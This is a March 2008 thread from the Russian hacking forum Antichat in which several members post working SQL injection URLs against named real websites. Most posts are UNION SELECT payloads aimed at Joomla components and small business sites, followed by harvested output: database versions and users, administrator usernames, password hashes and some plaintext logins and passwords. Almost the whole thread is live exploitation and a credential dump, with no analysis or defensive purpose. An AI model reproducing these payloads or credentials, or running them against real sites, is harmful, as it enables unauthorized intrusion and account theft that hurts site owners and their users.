ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5181  
Старый 24.03.2008, 06:46
Klaus Doring
Участник форума
Регистрация: 23.07.2007
Сообщений: 100
Провел на форуме:
620976

Репутация: 52
Отправить сообщение для Klaus Doring с помощью ICQ
По умолчанию

Цитата:
http://hydromarket.net/index.php?option=com_d3000&task=showarticles&id=-99999/**/union/**/select/**/0,username,pass_word/**/from/**/admin/*
admin : 4cb9c8a8048fd02294477fcb1a41191a
 
Ответить с цитированием

  #5182  
Старый 24.03.2008, 16:46
Snap
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288

Репутация: 82
Отправить сообщение для Snap с помощью ICQ
По умолчанию

Танцивальный клуб "Россис"

http://www.rossis.ru/news/?nid=-6+union+select+1,2,concat(table_schema,0x3a,table_ name,0x3a,column_name),4,5+from+information_schema .columns+limit+1,1/*

http://www.rossis.ru/news/?nid=-6+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat( login,char(58),password),0x71),0x71),4,5+from+titl es+limit+0,1/*
(Отсутствует вывод )

---------------------------------------------------------------------------------------------

http://www.superpopugai.ru/?page=video&birds_id=79+union+select+1,2,3,4,5,con cat(user_name,char(58),user_password,char(58),user _id),7+from+cpg130_users+limit+1,3/*

http://www.superpopugai.ru/?page=video&birds_id=79+union+select+1,2,3,4,5,con cat(username,char(58),password),7+from+users+limit +0,100/*

http://www.superpopugai.ru/?page=video&birds_id=79+union+select+1,2,3,4,5,con cat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAM E),7+from+INFORMATION_SCHEMA.COLUMNS+limit+0,50000/*

Последний раз редактировалось Snap; 24.03.2008 в 16:50..
 
Ответить с цитированием

  #5183  
Старый 24.03.2008, 23:19
t0ox
Новичок
Регистрация: 23.10.2007
Сообщений: 17
Провел на форуме:
105851

Репутация: 46
По умолчанию

Код:
http://www.gykd.co.za/gykd/reviews/bikes.html?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(version(),database(),user()),11,12,13,14,15,16,17,18,19/*
DATABASE: gykd
VERSION: 4.0.17
USER: web@localhost
PR: 2

******************************

Код:
http://www.muzyka.bosko.pl/mp3/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
DATABASE: boskobosko
VERSION: 5.0.44-log
USER: boskobosko@10.0.63.85
PR: 4

Код:
http://www.muzyka.bosko.pl/mp3/?id=-1+union+select+1,pass,3,4,5,6,login,8,id,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+users+where+id=1/*
LOGIN: wrzeszcz
PASS: bosko

******************************

поправления к моему посту.

Код:
http://www.rtp.org/main/index.php?pid=-1+union+select+1,2,3/*
Код:
http://www.rtp.org/main/index.php?pid=-1+union+select+1,2,concat_ws(version(),database(),user())/*
DATABASE: rtf
VERSION: 5.0.22
USER: root@localhost
PR: 6

Код:
http://www.rtp.org/main/index.php?pid=-1+union+select+1,2,concat_ws(0x3a,username,userpassword)+from+user/*
carla:52a250762b8d0573

хэш неосилил

http://www.rtp.org/admin/loginform.php

Последний раз редактировалось t0ox; 24.03.2008 в 23:25..
 
Ответить с цитированием

  #5184  
Старый 24.03.2008, 23:37
Loker
Познающий
Регистрация: 25.10.2007
Сообщений: 69
Провел на форуме:
348179

Репутация: 52
По умолчанию

http://sanprosvet.ru/ru/page/index.php?id=-3+union+select+1,2,3,4,5,6,7,8,Version(),10,11,12, 13,14,15,16,17,18,19,20/*

Version 5.27

Фен шуй
http://www.fengshuiby.com/ru/page/index.php?id=-8+union+select+1,2,3,4,5,6,7,8,Version(),10,11,12, 13,14,15,16,17,18,19,20/*
Version 4.1.22-standart
User siteis_user@localhost
Database siteis_siteis

Последний раз редактировалось Loker; 24.03.2008 в 23:52..
 
Ответить с цитированием

  #5185  
Старый 24.03.2008, 23:41
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509

Репутация: 338
Отправить сообщение для CaNNabi$ с помощью ICQ
По умолчанию

bag
http://www.gamingreport.com
http://www.worldnetdaily.com
БОЯН!!!
Отвечаю заепали, вам что лень посмотреть АНТИБОЯН?!
 
Ответить с цитированием

  #5186  
Старый 25.03.2008, 04:59
bag
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346

Репутация: 146
По умолчанию

Код:
http://www.taminco.com/index.php?option=com_rekry&Itemid=119&rekryview=view&op_id=-1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20jos_users+limit+1,1--
SantiagoIrizarry:1876a90330b1c4a9e2aec571d0a2d54c

Код:
http://www.prastel.com/index.php?option=com_rekry&Itemid=105&rekryview=add&op_id=-1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20jos_users+limit+1,1--
wappo:e6b2233d38f54b24e3fff99beef9b8e4

Код:
http://www.opelkomnenovic.co.yu/start/index.php?option=com_rekry&Itemid=111&rekryview=add&op_id=-1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20jos_users+limit+1,1--
Pitanje : velisa:728a9a43f4d413c8bde3d34373b1da64

Код:
http://www.technespa.com/index.php?option=com_rekry&Itemid=145&rekryview=add&op_id=-1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20jos_users+limit+1,1--
MuckeD:14ea4d7dd8c0acdc724c943fa9f942df

Код:
http://www.infotal.es/index.php?option=com_rekry&Itemid=37&rekryview=add&op_id=-1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20jos_users+limit+1,1--
victor:57dbbe27ff919728e60e88a19bc4893a:U44IcyNPzR X4JI49

Последний раз редактировалось bag; 25.03.2008 в 22:32..
 
Ответить с цитированием

  #5187  
Старый 25.03.2008, 05:23
bag
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346

Репутация: 146
По умолчанию

Код:
http://int.holinski-partners.com/index.php?option=com_neoreferences&Itemid=30&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*
Код:
http://www.thedesignconsultants.com/portfolio/12/index.php?option=com_neoreferences&Itemid=26&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*
Код:
http://www.foxrecruiting.co.uk/jobs/index.php?option=com_neoreferences&Itemid=41&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*
Код:
http://www.fotogram.nazwa.pl/fotogram/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--
Код:
http://poetycznie.com/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--
Код:
http://www.perureview.com/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--
ппц название сайта)))))
Код:
http://www.verloskundigepraktijkhoogeveen.nl/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--
Код:
http://emavitos.com/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--
Код:
http://ftv.flameghana.org/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--
Код:
http://thevagrantverse.com/Joomla/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--
Код:
http://www.thewritersblox.com/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--
Код:
http://www.sanskimost.com/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--
Код:
http://www.getsatisfied.org/main/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--
Код:
http://www.prolocoferriere.com/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--
Код:
http://qarsak.com/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--
Код:
http://www.teoria1.com/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--

Последний раз редактировалось bag; 25.03.2008 в 22:33..
 
Ответить с цитированием

  #5188  
Старый 25.03.2008, 08:37
Amoura
Участник форума
Регистрация: 23.01.2008
Сообщений: 182
Провел на форуме:
2268999

Репутация: 410
Отправить сообщение для Amoura с помощью ICQ
По умолчанию

http://konkord.dp.ua/catalog.php?id=-7+union+select+1,2,3,4,Version(),6,7,8,9/*

4.0.27-standard-log

http://konkord.dp.ua/catalog.php?id=-7+union+select+1,2,3,4,database(),6,7,8,9/*

genixar_konkord

http://konkord.dp.ua/catalog.php?id=-7+union+select+1,2,3,4,user(),6,7,8,9/*

genixar_konkord@localhost
 
Ответить с цитированием

  #5189  
Старый 25.03.2008, 09:34
Buffalon
Постоянный
Регистрация: 22.03.2008
Сообщений: 325
Провел на форуме:
1208132

Репутация: 63
По умолчанию

Цитата:
Сообщение от bag  
а вообще вот
http://giftman.ru/news_view.php?news_id=9999+union+select+1,2,3,conc at_ws(0x2F,user,password),5,6,7+from+mysql.user/*
Поковырялся дальше...
http://giftman.ru/news_view.php?news_id=9999+union+select+1,2,3,conc at_ws(0x2A,login,pwd_hash,email),5,6,7+FROM+u15364 .ra_users/*
 
Ответить с цитированием

  #5190  
Старый 25.03.2008, 13:02
Snap
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288

Репутация: 82
Отправить сообщение для Snap с помощью ICQ
По умолчанию

Учебно-тренинговый центр (IPB)

http://rostov-trening.ru/index.php?act=program&pid=18&from=&id=-22+union+select+1,concat(user(),char(58),database( ),char(58),version()),3,5,6,7,8,9,10,11/*

ayaks@localhost:ayks:4.1.22
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ